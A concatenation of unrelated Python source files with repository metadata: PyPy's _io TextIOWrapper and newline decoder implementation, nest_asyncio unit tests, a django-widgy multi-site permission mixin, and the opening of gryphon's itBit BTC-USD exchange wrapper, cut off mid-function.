elif output.find(u'\r') >= 0:
# Translate!
builder = UnicodeBuilder(output_len)
i = 0
while i < output_len:
c = output[i]
i += 1
if c == u'\n':
seennl |= SEEN_LF
elif c == u'\r':
if i < output_len and output[i] == u'\n':
seennl |= SEEN_CRLF
i += 1
else:
seennl |= SEEN_CR
builder.append(u'\n')
continue
builder.append(c)
output = builder.build()
self.seennl |= seennl
return space.newunicode(output)
def reset_w(self, space):
self.seennl = 0
self.pendingcr = False
if self.w_decoder and not space.is_w(self.w_decoder, space.w_None):
space.call_method(self.w_decoder, "reset")
def getstate_w(self, space):
if self.w_decoder and not space.is_w(self.w_decoder, space.w_None):
w_state = space.call_method(self.w_decoder, "getstate")
w_buffer, w_flag = space.unpackiterable(w_state, 2)
flag = space.r_longlong_w(w_flag)
else:
w_buffer = space.newbytes("")
flag = 0
flag <<= 1
if self.pendingcr:
flag |= 1
return space.newtuple([w_buffer, space.newint(flag)])
def setstate_w(self, space, w_state):
w_buffer, w_flag = space.unpackiterable(w_state, 2)
flag = space.r_longlong_w(w_flag)
self.pendingcr = bool(flag & 1)
flag >>= 1
if self.w_decoder and not space.is_w(self.w_decoder, space.w_None):
w_state = space.newtuple([w_buffer, space.newint(flag)])
space.call_method(self.w_decoder, "setstate", w_state)
W_IncrementalNewlineDecoder.typedef = TypeDef(
'_io.IncrementalNewlineDecoder',
__new__ = generic_new_descr(W_IncrementalNewlineDecoder),
__init__ = interp2app(W_IncrementalNewlineDecoder.descr_init),
decode = interp2app(W_IncrementalNewlineDecoder.decode_w),
reset = interp2app(W_IncrementalNewlineDecoder.reset_w),
getstate = interp2app(W_IncrementalNewlineDecoder.getstate_w),
setstate = interp2app(W_IncrementalNewlineDecoder.setstate_w),
newlines = GetSetProperty(W_IncrementalNewlineDecoder.newlines_get_w),
)
class W_TextIOBase(W_IOBase):
w_encoding = None
def __init__(self, space):
W_IOBase.__init__(self, space)
def read_w(self, space, w_size=None):
self._unsupportedoperation(space, "read")
def readline_w(self, space, w_limit=None):
self._unsupportedoperation(space, "readline")
def write_w(self, space, w_data):
self._unsupportedoperation(space, "write")
def detach_w(self, space):
self._unsupportedoperation(space, "detach")
def errors_get_w(self, space):
return space.w_None
def newlines_get_w(self, space):
return space.w_None
W_TextIOBase.typedef = TypeDef(
'_io._TextIOBase', W_IOBase.typedef,
__new__ = generic_new_descr(W_TextIOBase),
read = interp2app(W_TextIOBase.read_w),
readline = interp2app(W_TextIOBase.readline_w),
write = interp2app(W_TextIOBase.write_w),
detach = interp2app(W_TextIOBase.detach_w),
encoding = interp_attrproperty_w("w_encoding", W_TextIOBase),
newlines = GetSetProperty(W_TextIOBase.newlines_get_w),
errors = GetSetProperty(W_TextIOBase.errors_get_w),
)
def _determine_encoding(space, encoding):
if encoding is not None:
return space.newtext(encoding)
try:
w_locale = space.call_method(space.builtin, '__import__',
space.newtext('locale'))
w_encoding = space.call_method(w_locale, 'getpreferredencoding')
except OperationError as e:
# getpreferredencoding() may also raise ImportError
if not e.match(space, space.w_ImportError):
raise
return space.newtext('ascii')
else:
if space.isinstance_w(w_encoding, space.w_text):
return w_encoding
raise oefmt(space.w_IOError, "could not determine default encoding")
class PositionCookie(object):
def __init__(self, bigint):
self.start_pos = bigint.ulonglongmask()
bigint = bigint.rshift(r_ulonglong.BITS)
x = intmask(bigint.uintmask())
assert x >= 0
self.dec_flags = x
bigint = bigint.rshift(r_uint.BITS)
x = intmask(bigint.uintmask())
assert x >= 0
self.bytes_to_feed = x
bigint = bigint.rshift(r_uint.BITS)
x = intmask(bigint.uintmask())
assert x >= 0
self.chars_to_skip = x
bigint = bigint.rshift(r_uint.BITS)
self.need_eof = bigint.tobool()
def pack(self):
# The meaning of a tell() cookie is: seek to position, set the
# decoder flags to dec_flags, read bytes_to_feed bytes, feed them
# into the decoder with need_eof as the EOF flag, then skip
# chars_to_skip characters of the decoded result. For most simple
# decoders, tell() will often just give a byte offset in the file.
rb = rbigint.fromrarith_int
res = rb(self.start_pos)
bits = r_ulonglong.BITS
res = res.or_(rb(r_uint(self.dec_flags)).lshift(bits))
bits += r_uint.BITS
res = res.or_(rb(r_uint(self.bytes_to_feed)).lshift(bits))
bits += r_uint.BITS
res = res.or_(rb(r_uint(self.chars_to_skip)).lshift(bits))
bits += r_uint.BITS
return res.or_(rb(r_uint(self.need_eof)).lshift(bits))
class PositionSnapshot:
def __init__(self, flags, input):
self.flags = flags
self.input = input
class DecodeBuffer(object):
def __init__(self, text=None):
self.text = text
self.pos = 0
def set(self, space, w_decoded):
check_decoded(space, w_decoded)
self.text = space.unicode_w(w_decoded)
self.pos = 0
def reset(self):
self.text = None
self.pos = 0
def get_chars(self, size):
if self.text is None:
return u""
available = len(self.text) - self.pos
if size < 0 or size > available:
size = available
assert size >= 0
if self.pos > 0 or size < available:
start = self.pos
end = self.pos + size
assert start >= 0
assert end >= 0
chars = self.text[start:end]
else:
chars = self.text
self.pos += size
return chars
def has_data(self):
return (self.text is not None and not self.exhausted())
def exhausted(self):
return self.pos >= len(self.text)
def next_char(self):
if self.exhausted():
raise StopIteration
ch = self.text[self.pos]
self.pos += 1
return ch
def peek_char(self):
# like next_char, but doesn't advance pos
if self.exhausted():
raise StopIteration
ch = self.text[self.pos]
return ch
def find_newline_universal(self, limit):
# Universal newline search. Find any of \r, \r\n, \n
# The decoder ensures that \r\n are not split in two pieces
if limit < 0:
limit = sys.maxint
scanned = 0
while scanned < limit:
try:
ch = self.next_char()
scanned += 1
except StopIteration:
return False
if ch == u'\n':
return True
if ch == u'\r':
if scanned >= limit:
return False
try:
ch = self.peek_char()
except StopIteration:
return False
if ch == u'\n':
self.next_char()
return True
else:
return True
return False
def find_crlf(self, limit):
if limit < 0:
limit = sys.maxint
scanned = 0
while scanned < limit:
try:
ch = self.next_char()
except StopIteration:
return False
scanned += 1
if ch == u'\r':
if scanned >= limit:
return False
try:
if self.peek_char() == u'\n':
self.next_char()
return True
except StopIteration:
# This is the tricky case: we found a \r right at the end
self.pos -= 1
return False
return False
def find_char(self, marker, limit):
if limit < 0:
limit = sys.maxint
scanned = 0
while scanned < limit:
try:
ch = self.next_char()
except StopIteration:
return False
if ch == marker:
return True
scanned += 1
return False
def check_decoded(space, w_decoded):
if not space.isinstance_w(w_decoded, space.w_unicode):
msg = "decoder should return a string result, not '%T'"
raise oefmt(space.w_TypeError, msg, w_decoded)
return w_decoded
class W_TextIOWrapper(W_TextIOBase):
def __init__(self, space):
W_TextIOBase.__init__(self, space)
self.state = STATE_ZERO
self.w_encoder = None
self.w_decoder = None
self.decoded = DecodeBuffer()
self.pending_bytes = None # list of bytes objects waiting to be
# written, or NULL
self.chunk_size = 8192
self.readuniversal = False
self.readtranslate = False
self.readnl = None
self.encodefunc = None # Specialized encoding func (see below)
self.encoding_start_of_stream = False # Whether or not it's the start
# of the stream
self.snapshot = None
@unwrap_spec(encoding="text_or_none", line_buffering=int)
def descr_init(self, space, w_buffer, encoding=None,
w_errors=None, w_newline=None, line_buffering=0):
self.state = STATE_ZERO
self.w_buffer = w_buffer
self.w_encoding = _determine_encoding(space, encoding)
if space.is_none(w_errors):
w_errors = space.newtext("strict")
self.w_errors = w_errors
if space.is_none(w_newline):
newline = None
else:
newline = space.unicode_w(w_newline)
if newline and newline not in (u'\n', u'\r\n', u'\r'):
raise oefmt(space.w_ValueError,
"illegal newline value: %R", w_newline)
self.line_buffering = line_buffering
self.readuniversal = not newline # null or empty
self.readtranslate = newline is None
self.readnl = newline
self.writetranslate = (newline != u'')
if not self.readuniversal:
self.writenl = self.readnl
if self.writenl == u'\n':
self.writenl = None
elif _WINDOWS:
self.writenl = u"\r\n"
else:
self.writenl = None
# build the decoder object
if space.is_true(space.call_method(w_buffer, "readable")):
w_codec = interp_codecs.lookup_codec(space,
space.text_w(self.w_encoding))
self.w_decoder = space.call_method(w_codec,
"incrementaldecoder", w_errors)
if self.readuniversal:
self.w_decoder = space.call_function(
space.gettypeobject(W_IncrementalNewlineDecoder.typedef),
self.w_decoder, space.newbool(self.readtranslate))
# build the encoder object
if space.is_true(space.call_method(w_buffer, "writable")):
w_codec = interp_codecs.lookup_codec(space,
space.text_w(self.w_encoding))
self.w_encoder = space.call_method(w_codec,
"incrementalencoder", w_errors)
self.seekable = space.is_true(space.call_method(w_buffer, "seekable"))
self.telling = self.seekable
self.encoding_start_of_stream = False
if self.seekable and self.w_encoder:
self.encoding_start_of_stream = True
w_cookie = space.call_method(self.w_buffer, "tell")
if not space.eq_w(w_cookie, space.newint(0)):
self.encoding_start_of_stream = False
space.call_method(self.w_encoder, "setstate", space.newint(0))
self.state = STATE_OK
def _check_init(self, space):
if self.state == STATE_ZERO:
raise oefmt(space.w_ValueError,
"I/O operation on uninitialized object")
def _check_attached(self, space):
if self.state == STATE_DETACHED:
raise oefmt(space.w_ValueError,
"underlying buffer has been detached")
self._check_init(space)
def _check_closed(self, space, message=None):
self._check_init(space)
W_TextIOBase._check_closed(self, space, message)
def descr_repr(self, space):
self._check_init(space)
w_name = space.findattr(self, space.newtext("name"))
if w_name is None:
w_name_str = space.newtext("")
else:
w_name_str = space.mod(space.newtext("name=%r "), w_name)
w_args = space.newtuple([w_name_str, self.w_encoding])
return space.mod(
space.newtext("<_io.TextIOWrapper %sencoding=%r>"), w_args
)
def readable_w(self, space):
self._check_attached(space)
return space.call_method(self.w_buffer, "readable")
def writable_w(self, space):
self._check_attached(space)
return space.call_method(self.w_buffer, "writable")
def seekable_w(self, space):
self._check_attached(space)
return space.call_method(self.w_buffer, "seekable")
def isatty_w(self, space):
self._check_attached(space)
return space.call_method(self.w_buffer, "isatty")
def fileno_w(self, space):
self._check_attached(space)
return space.call_method(self.w_buffer, "fileno")
def closed_get_w(self, space):
self._check_attached(space)
return space.getattr(self.w_buffer, space.newtext("closed"))
def newlines_get_w(self, space):
self._check_attached(space)
if self.w_decoder is None:
return space.w_None
return space.findattr(self.w_decoder, space.newtext("newlines"))
def name_get_w(self, space):
self._check_attached(space)
return space.getattr(self.w_buffer, space.newtext("name"))
def flush_w(self, space):
self._check_attached(space)
self._check_closed(space)
self.telling = self.seekable
self._writeflush(space)
space.call_method(self.w_buffer, "flush")
@unwrap_spec(w_pos = WrappedDefault(None))
def truncate_w(self, space, w_pos=None):
self._check_attached(space)
space.call_method(self, "flush")
return space.call_method(self.w_buffer, "truncate", w_pos)
def close_w(self, space):
self._check_attached(space)
if not space.is_true(space.getattr(self.w_buffer,
space.newtext("closed"))):
try:
space.call_method(self, "flush")
finally:
ret = space.call_method(self.w_buffer, "close")
return ret
# _____________________________________________________________
# read methods
def _read_chunk(self, space):
"""Read and decode the next chunk of data from the BufferedReader.
The return value is True unless EOF was reached. The decoded string
is placed in self.decoded (replacing its previous value).
The entire input chunk is sent to the decoder, though some of it may
remain buffered in the decoder, yet to be converted."""
if not self.w_decoder:
raise oefmt(space.w_IOError, "not readable")
if self.telling:
# To prepare for tell(), we need to snapshot a point in the file
# where the decoder's input buffer is empty.
w_state = space.call_method(self.w_decoder, "getstate")
# Given this, we know there was a valid snapshot point
# len(dec_buffer) bytes ago with decoder state (b'', dec_flags).
w_dec_buffer, w_dec_flags = space.unpackiterable(w_state, 2)
dec_buffer = space.bytes_w(w_dec_buffer)
dec_flags = space.int_w(w_dec_flags)
else:
dec_buffer = None
dec_flags = 0
# Read a chunk, decode it, and put the result in self.decoded
w_input = space.call_method(self.w_buffer, "read1",
space.newint(self.chunk_size))
if not space.isinstance_w(w_input, space.w_bytes):
msg = "decoder getstate() should have returned a bytes " \
"object not '%T'"
raise oefmt(space.w_TypeError, msg, w_input)
eof = space.len_w(w_input) == 0
w_decoded = space.call_method(self.w_decoder, "decode",
w_input, space.newbool(eof))
self.decoded.set(space, w_decoded)
if space.len_w(w_decoded) > 0:
eof = False
if self.telling:
# At the snapshot point, len(dec_buffer) bytes before the read,
# the next input to be decoded is dec_buffer + input_chunk.
next_input = dec_buffer + space.bytes_w(w_input)
self.snapshot = PositionSnapshot(dec_flags, next_input)
return not eof
def _ensure_data(self, space):
while not self.decoded.has_data():
try:
if not self._read_chunk(space):
self.decoded.reset()
self.snapshot = None
return False
except OperationError as e:
if trap_eintr(space, e):
continue
raise
return True
def next_w(self, space):
self._check_attached(space)
self.telling = False
try:
return W_TextIOBase.next_w(self, space)
except OperationError as e:
if e.match(space, space.w_StopIteration):
self.telling = self.seekable
raise
def read_w(self, space, w_size=None):
self._check_attached(space)
self._check_closed(space)
if not self.w_decoder:
raise oefmt(space.w_IOError, "not readable")
size = convert_size(space, w_size)
self._writeflush(space)
if size < 0:
# Read everything
w_bytes = space.call_method(self.w_buffer, "read")
w_decoded = space.call_method(self.w_decoder, "decode", w_bytes, space.w_True)
check_decoded(space, w_decoded)
w_result = space.newunicode(self.decoded.get_chars(-1))
w_final = space.add(w_result, w_decoded)
self.snapshot = None
return w_final
remaining = size
builder = UnicodeBuilder(size)
# Keep reading chunks until we have n characters to return
while remaining > 0:
if not self._ensure_data(space):
break
data = self.decoded.get_chars(remaining)
builder.append(data)
remaining -= len(data)
return space.newunicode(builder.build())
def _scan_line_ending(self, limit):
if self.readuniversal:
return self.decoded.find_newline_universal(limit)
else:
if self.readtranslate:
# Newlines are already translated, only search for \n
newline = u'\n'
else:
# Non-universal mode.
newline = self.readnl
if newline == u'\r\n':
return self.decoded.find_crlf(limit)
else:
return self.decoded.find_char(newline[0], limit)
def readline_w(self, space, w_limit=None):
self._check_attached(space)
self._check_closed(space)
self._writeflush(space)
limit = convert_size(space, w_limit)
remnant = None
builder = UnicodeBuilder()
while True:
# First, get some data if necessary
has_data = self._ensure_data(space)
if not has_data:
# end of file
if remnant:
builder.append(remnant)
break
if remnant:
assert not self.readtranslate and self.readnl == u'\r\n'
assert self.decoded.pos == 0
if remnant == u'\r' and self.decoded.text[0] == u'\n':
builder.append(u'\r\n')
self.decoded.pos = 1
remnant = None
break
else:
builder.append(remnant)
remnant = None
continue
if limit >= 0:
remaining = limit - builder.getlength()
assert remaining >= 0
else:
remaining = -1
start = self.decoded.pos
assert start >= 0
found = self._scan_line_ending(remaining)
end_scan = self.decoded.pos
if end_scan > start:
s = self.decoded.text[start:end_scan]
builder.append(s)
if found or (limit >= 0 and builder.getlength() >= limit):
break
# There may be some remaining chars we'll have to prepend to the
# next chunk of data
if not self.decoded.exhausted():
remnant = self.decoded.get_chars(-1)
# We have consumed the buffer
self.decoded.reset()
result = builder.build()
return space.newunicode(result)
# _____________________________________________________________
# write methods
def write_w(self, space, w_text):
self._check_attached(space)
self._check_closed(space)
if not self.w_encoder:
raise oefmt(space.w_IOError, "not writable")
if not space.isinstance_w(w_text, space.w_unicode):
raise oefmt(space.w_TypeError,
"unicode argument expected, got '%T'", w_text)
text = space.unicode_w(w_text)
textlen = len(text)
haslf = False
if (self.writetranslate and self.writenl) or self.line_buffering:
if text.find(u'\n') >= 0:
haslf = True
if haslf and self.writetranslate and self.writenl:
w_text = space.call_method(w_text, "replace", space.newunicode(u'\n'),
space.newunicode(self.writenl))
text = space.unicode_w(w_text)
needflush = False
if self.line_buffering and (haslf or text.find(u'\r') >= 0):
needflush = True
# XXX What if we were just reading?
if self.encodefunc:
w_bytes = self.encodefunc(space, w_text, self.errors)
self.encoding_start_of_stream = False
else:
w_bytes = space.call_method(self.w_encoder, "encode", w_text)
b = space.bytes_w(w_bytes)
if not self.pending_bytes:
self.pending_bytes = []
self.pending_bytes_count = 0
self.pending_bytes.append(b)
self.pending_bytes_count += len(b)
if self.pending_bytes_count > self.chunk_size or needflush:
self._writeflush(space)
if needflush:
space.call_method(self.w_buffer, "flush")
self.snapshot = None
if self.w_decoder:
space.call_method(self.w_decoder, "reset")
return space.newint(textlen)
def _writeflush(self, space):
if not self.pending_bytes:
return
pending_bytes = ''.join(self.pending_bytes)
self.pending_bytes = None
self.pending_bytes_count = 0
while True:
try:
space.call_method(self.w_buffer, "write",
space.newbytes(pending_bytes))
except OperationError as e:
if trap_eintr(space, e):
continue
raise
else:
break
def detach_w(self, space):
self._check_attached(space)
space.call_method(self, "flush")
w_buffer = self.w_buffer
self.w_buffer = None
self.state = STATE_DETACHED
return w_buffer
# _____________________________________________________________
# seek/tell
def _decoder_setstate(self, space, cookie):
# When seeking to the start of the stream, we call decoder.reset()
# rather than decoder.getstate().
# This is for a few decoders such as utf-16 for which the state value
# at start is not (b"", 0) but e.g. (b"", 2) (meaning, in the case of
# utf-16, that we are expecting a BOM).
if cookie.start_pos == 0 and cookie.dec_flags == 0:
space.call_method(self.w_decoder, "reset")
else:
space.call_method(self.w_decoder, "setstate",
space.newtuple([space.newbytes(""),
space.newint(cookie.dec_flags)]))
def _encoder_setstate(self, space, cookie):
if cookie.start_pos == 0 and cookie.dec_flags == 0:
space.call_method(self.w_encoder, "reset")
self.encoding_start_of_stream = True
else:
space.call_method(self.w_encoder, "setstate", space.newint(0))
self.encoding_start_of_stream = False
@unwrap_spec(whence=int)
def seek_w(self, space, w_pos, whence=0):
self._check_attached(space)
if not self.seekable:
raise oefmt(space.w_IOError, "underlying stream is not seekable")
if whence == 1:
# seek relative to current position
if not space.eq_w(w_pos, space.newint(0)):
raise oefmt(space.w_IOError,
"can't do nonzero cur-relative seeks")
# Seeking to the current position should attempt to sync the
# underlying buffer with the current position.
w_pos = space.call_method(self, "tell")
elif whence == 2:
# seek relative to end of file
if not space.eq_w(w_pos, space.newint(0)):
raise oefmt(space.w_IOError,
"can't do nonzero end-relative seeks")
space.call_method(self, "flush")
self.decoded.reset()
self.snapshot = None
if self.w_decoder:
space.call_method(self.w_decoder, "reset")
return space.call_method(self.w_buffer, "seek",
w_pos, space.newint(whence))
elif whence != 0:
raise oefmt(space.w_ValueError,
"invalid whence (%d, should be 0, 1 or 2)",
whence)
if space.is_true(space.lt(w_pos, space.newint(0))):
raise oefmt(space.w_ValueError,
"negative seek position %R", w_pos)
space.call_method(self, "flush")
# The strategy of seek() is to go back to the safe start point and
# replay the effect of read(chars_to_skip) from there.
cookie = PositionCookie(space.bigint_w(w_pos))
# Seek back to the safe start point
space.call_method(self.w_buffer, "seek", space.newint(cookie.start_pos))
self.decoded.reset()
self.snapshot = None
# Restore the decoder to its state from the safe start point.
if self.w_decoder:
self._decoder_setstate(space, cookie)
if cookie.chars_to_skip:
# Just like _read_chunk, feed the decoder and save a snapshot.
w_chunk = space.call_method(self.w_buffer, "read",
space.newint(cookie.bytes_to_feed))
if not space.isinstance_w(w_chunk, space.w_bytes):
msg = "underlying read() should have returned " \
"a bytes object, not '%T'"
raise oefmt(space.w_TypeError, msg, w_chunk)
self.snapshot = PositionSnapshot(cookie.dec_flags,
space.bytes_w(w_chunk))
w_decoded = space.call_method(self.w_decoder, "decode",
w_chunk, space.newbool(bool(cookie.need_eof)))
w_decoded = check_decoded(space, w_decoded)
# Skip chars_to_skip of the decoded characters
if space.len_w(w_decoded) < cookie.chars_to_skip:
raise oefmt(space.w_IOError,
"can't restore logical file position")
self.decoded.set(space, w_decoded)
self.decoded.pos = cookie.chars_to_skip
else:
self.snapshot = PositionSnapshot(cookie.dec_flags, "")
# Finally, reset the encoder (merely useful for proper BOM handling)
if self.w_encoder:
self._encoder_setstate(space, cookie)
return w_pos
def tell_w(self, space):
self._check_closed(space)
if not self.seekable:
raise oefmt(space.w_IOError, "underlying stream is not seekable")
if not self.telling:
raise oefmt(space.w_IOError,
"telling position disabled by next() call")
self._writeflush(space)
space.call_method(self, "flush")
w_pos = space.call_method(self.w_buffer, "tell")
if self.w_decoder is None or self.snapshot is None:
assert not self.decoded.text
return w_pos
cookie = PositionCookie(space.bigint_w(w_pos))
# Skip backward to the snapshot point (see _read_chunk)
cookie.dec_flags = self.snapshot.flags
input = self.snapshot.input
cookie.start_pos -= len(input)
# How many decoded characters have been used up since the snapshot?
if not self.decoded.pos:
# We haven't moved from the snapshot point.
return space.newlong_from_rbigint(cookie.pack())
chars_to_skip = self.decoded.pos
# Starting from the snapshot position, we will walk the decoder
# forward until it gives us enough decoded characters.
w_saved_state = space.call_method(self.w_decoder, "getstate")
try:
# Note our initial start point
self._decoder_setstate(space, cookie)
# Feed the decoder one byte at a time. As we go, note the nearest
# "safe start point" before the current location (a point where
# the decoder has nothing buffered, so seek() can safely start
# from there and advance to this location).
chars_decoded = 0
i = 0
while i < len(input):
w_decoded = space.call_method(self.w_decoder, "decode",
space.newbytes(input[i]))
check_decoded(space, w_decoded)
chars_decoded += space.len_w(w_decoded)
cookie.bytes_to_feed += 1
w_state = space.call_method(self.w_decoder, "getstate")
w_dec_buffer, w_flags = space.unpackiterable(w_state, 2)
dec_buffer_len = space.len_w(w_dec_buffer)
if dec_buffer_len == 0 and chars_decoded <= chars_to_skip:
# Decoder buffer is empty, so this is a safe start point.
cookie.start_pos += cookie.bytes_to_feed
chars_to_skip -= chars_decoded
assert chars_to_skip >= 0
cookie.dec_flags = space.int_w(w_flags)
cookie.bytes_to_feed = 0
chars_decoded = 0
if chars_decoded >= chars_to_skip:
break
i += 1
else:
# We didn't get enough decoded data; signal EOF to get more.
w_decoded = space.call_method(self.w_decoder, "decode",
space.newbytes(""),
space.newint(1)) # final=1
check_decoded(space, w_decoded)
chars_decoded += space.len_w(w_decoded)
cookie.need_eof = 1
if chars_decoded < chars_to_skip:
raise oefmt(space.w_IOError,
"can't reconstruct logical file position")
finally:
space.call_method(self.w_decoder, "setstate", w_saved_state)
# The returned cookie corresponds to the last safe start point.
cookie.chars_to_skip = chars_to_skip
return space.newlong_from_rbigint(cookie.pack())
def chunk_size_get_w(self, space):
self._check_attached(space)
return space.newint(self.chunk_size)
def chunk_size_set_w(self, space, w_size):
self._check_attached(space)
size = space.int_w(w_size)
if size <= 0:
raise oefmt(space.w_ValueError,
"a strictly positive integer is required")
self.chunk_size = size
W_TextIOWrapper.typedef = TypeDef(
'_io.TextIOWrapper', W_TextIOBase.typedef,
__new__ = generic_new_descr(W_TextIOWrapper),
__init__ = interp2app(W_TextIOWrapper.descr_init),
__repr__ = interp2app(W_TextIOWrapper.descr_repr),
next = interp2app(W_TextIOWrapper.next_w),
read = interp2app(W_TextIOWrapper.read_w),
readline = interp2app(W_TextIOWrapper.readline_w),
write = interp2app(W_TextIOWrapper.write_w),
seek = interp2app(W_TextIOWrapper.seek_w),
tell = interp2app(W_TextIOWrapper.tell_w),
detach = interp2app(W_TextIOWrapper.detach_w),
flush = interp2app(W_TextIOWrapper.flush_w),
truncate = interp2app(W_TextIOWrapper.truncate_w),
close = interp2app(W_TextIOWrapper.close_w),
line_buffering = interp_attrproperty("line_buffering", W_TextIOWrapper,
wrapfn="newint"),
readable = interp2app(W_TextIOWrapper.readable_w),
writable = interp2app(W_TextIOWrapper.writable_w),
seekable = interp2app(W_TextIOWrapper.seekable_w),
isatty = interp2app(W_TextIOWrapper.isatty_w),
fileno = interp2app(W_TextIOWrapper.fileno_w),
name = GetSetProperty(W_TextIOWrapper.name_get_w),
buffer = interp_attrproperty_w("w_buffer", cls=W_TextIOWrapper),
closed = GetSetProperty(W_TextIOWrapper.closed_get_w),
errors = interp_attrproperty_w("w_errors", cls=W_TextIOWrapper),
newlines = GetSetProperty(W_TextIOWrapper.newlines_get_w),
_CHUNK_SIZE = GetSetProperty(
W_TextIOWrapper.chunk_size_get_w, W_TextIOWrapper.chunk_size_set_w
),
)
|
tests/nest_test.py
|
cheginit/nest_asyncio
| 362 |
66705
|
import asyncio
import sys
import unittest
import nest_asyncio
def exception_handler(loop, context):
print('Exception:', context)
class NestTest(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
nest_asyncio.apply(self.loop)
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.set_exception_handler(exception_handler)
def tearDown(self):
self.assertIsNone(asyncio._get_running_loop())
self.loop.close()
del self.loop
async def coro(self):
await asyncio.sleep(0.01)
return 42
def test_nesting(self):
async def f1():
result = self.loop.run_until_complete(self.coro())
self.assertEqual(result, await self.coro())
return result
async def f2():
result = self.loop.run_until_complete(f1())
self.assertEqual(result, await f1())
return result
result = self.loop.run_until_complete(f2())
self.assertEqual(result, 42)
def test_ensure_future_with_run_until_complete(self):
async def f():
task = asyncio.ensure_future(self.coro())
return self.loop.run_until_complete(task)
result = self.loop.run_until_complete(f())
self.assertEqual(result, 42)
def test_ensure_future_with_run_until_complete_with_wait(self):
async def f():
task = asyncio.ensure_future(self.coro())
done, pending = self.loop.run_until_complete(
asyncio.wait([task], return_when=asyncio.ALL_COMPLETED))
task = done.pop()
return task.result()
result = self.loop.run_until_complete(f())
self.assertEqual(result, 42)
def test_timeout(self):
async def f1():
await asyncio.sleep(0.1)
async def f2():
asyncio.run(asyncio.wait_for(f1(), 0.01))
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(f2())
def test_two_run_until_completes_in_one_outer_loop(self):
async def f1():
self.loop.run_until_complete(asyncio.sleep(0.02))
return 4
async def f2():
self.loop.run_until_complete(asyncio.sleep(0.01))
return 2
result = self.loop.run_until_complete(
asyncio.gather(f1(), f2()))
self.assertEqual(result, [4, 2])
@unittest.skipIf(sys.version_info < (3, 7, 0), 'No contextvars module')
def test_contextvars(self):
from contextvars import ContextVar
var = ContextVar('var')
var.set(0)
async def set_val():
var.set(42)
async def coro():
await set_val()
await asyncio.sleep(0.01)
return var.get()
result = self.loop.run_until_complete(coro())
self.assertEqual(result, 42)
if __name__ == '__main__':
unittest.main()
|
widgy/contrib/widgy_mezzanine/site.py
|
isopets/django-widgy
| 168 |
66709
|
<gh_stars>100-1000
from mezzanine.utils.sites import current_site_id, has_site_permission
from widgy.models import Content
class MultiSitePermissionMixin(object):
def _can_edit_content(self, request, obj):
if isinstance(obj, Content):
owners = obj.get_root().node.versiontracker_set.get().owners
any_owner_in_current_site = any(current_site_id() == o.site_id for o in owners)
return has_site_permission(request.user) and any_owner_in_current_site
else:
return True
def has_add_permission(self, request, parent, created_obj_cls):
if not self._can_edit_content(request, parent):
return False
return super(MultiSitePermissionMixin, self).has_add_permission(
request, parent, created_obj_cls)
def has_change_permission(self, request, obj_or_class):
if not self._can_edit_content(request, obj_or_class):
return False
return super(MultiSitePermissionMixin, self).has_change_permission(request, obj_or_class)
def has_delete_permission(self, request, obj_or_class):
if not all(self._can_edit_content(request, o) for o in obj_or_class.depth_first_order()):
return False
return super(MultiSitePermissionMixin, self).has_delete_permission(request, obj_or_class)
|
gryphon/lib/exchange/itbit_btc_usd.py
|
scooke11/gryphon
| 1,109 |
66717
|
<filename>gryphon/lib/exchange/itbit_btc_usd.py<gh_stars>1000+
"""
Exchange documentation: https://api.itbit.com/docs
"""
# -*- coding: utf-8 -*-
import base64
from collections import OrderedDict, defaultdict
import hashlib
import hmac
import json
import time
import urllib
import cdecimal
from cdecimal import Decimal
from gryphon.lib.exchange import exceptions
from gryphon.lib.exchange import order_types
from gryphon.lib.exchange.exchange_api_wrapper import ExchangeAPIWrapper
from gryphon.lib.logger import get_logger
from gryphon.lib.models.exchange import Balance
from gryphon.lib.money import Money
from gryphon.lib.time_parsing import parse
logger = get_logger(__name__)
class ItbitBTCUSDExchange(ExchangeAPIWrapper):
def __init__(self, session=None, configuration=None):
super(ItbitBTCUSDExchange, self).__init__(session)
self.name = u'ITBIT_BTC_USD'
self.friendly_name = u'Itbit BTC-USD'
self.base_url = 'https://api.itbit.com/v1'
self.currency = 'USD'
self.bid_string = 'buy'
self.ask_string = 'sell'
self.nonce = 1
# Configurables with defaults.
self.market_order_fee = Decimal('0.002')
self.limit_order_fee = Decimal('0')
self.fee = self.market_order_fee
self.fiat_balance_tolerance = Money('0.0001', 'USD')
self.volume_balance_tolerance = Money('0.00000001', 'BTC')
self.max_tick_speed = 1
self.min_order_size = Money('0', 'BTC')
self.use_cached_orderbook = False
if configuration:
self.configure(configuration)
@property
def wallet_id(self):
try:
self._wallet_id
except AttributeError:
self._wallet_id = self._load_env('ITBIT_BTC_USD_WALLET_ID')
return self._wallet_id
def req(self, req_method, url, **kwargs):
# Our auth_request method expects the params in the url.
assert '?' not in url
if 'params' in kwargs:
if kwargs['params']: # Check that it's not empty.
url += '?' + urllib.urlencode(kwargs['params'])
del kwargs['params']
req = super(ItbitBTCUSDExchange, self).req(req_method, url, **kwargs)
return req
def resp(self, req):
response = super(ItbitBTCUSDExchange, self).resp(req)
if 'error' in response and response['error']:
raise exceptions.ExchangeAPIErrorException(self, response['error'])
if 'code' in response:
errors_string = str(response['description'])
error_code = int(response['code'])
if error_code == 81001:
raise exceptions.InsufficientFundsError()
elif error_code == 10002:
raise exceptions.NonceError()
elif error_code == 81002:
raise exceptions.CancelOrderNotFoundError()
else:
raise exceptions.ExchangeAPIErrorException(
self,
'Code %s: %s' % (
error_code, errors_string,
))
return response
def all_trades(self, page=1):
req = self.all_trades_req(page)
return self.all_trades_resp(req)
def all_trades_req(self, page=1):
params = {}
if page:
params['page'] = page
return self.req(
'get',
'/wallets/%s/trades' % self.wallet_id,
params=params,
)
def all_trades_resp(self, req):
response = self.resp(req)
return response['tradingHistory']
def trades_for_orders(self, order_ids):
req = self.trades_for_orders_req()
return self.trades_for_orders_resp(req, order_ids)
def trades_for_orders_req(self):
return self.all_trades_req()
def trades_for_orders_resp(self, req, order_ids):
order_ids = [str(o) for o in order_ids]
trades = self.all_trades_resp(req)
matching_trades = defaultdict(list)
for trade in trades:
oid = str(trade['orderId'])
if oid in order_ids:
matching_trades[oid].append(trade)
return matching_trades
def all_orders(self, status=None, page=1):
req = self.all_orders_req(status, page)
return self.all_orders_resp(req)
def all_orders_req(self, status=None, page=1):
params = {}
if status:
params['status'] = status
if page:
params['page'] = page
return self.req(
'get',
'/wallets/%s/orders' % self.wallet_id,
params=params,
)
def all_orders_resp(self, req):
raw_orders = self.resp(req)
orders = []
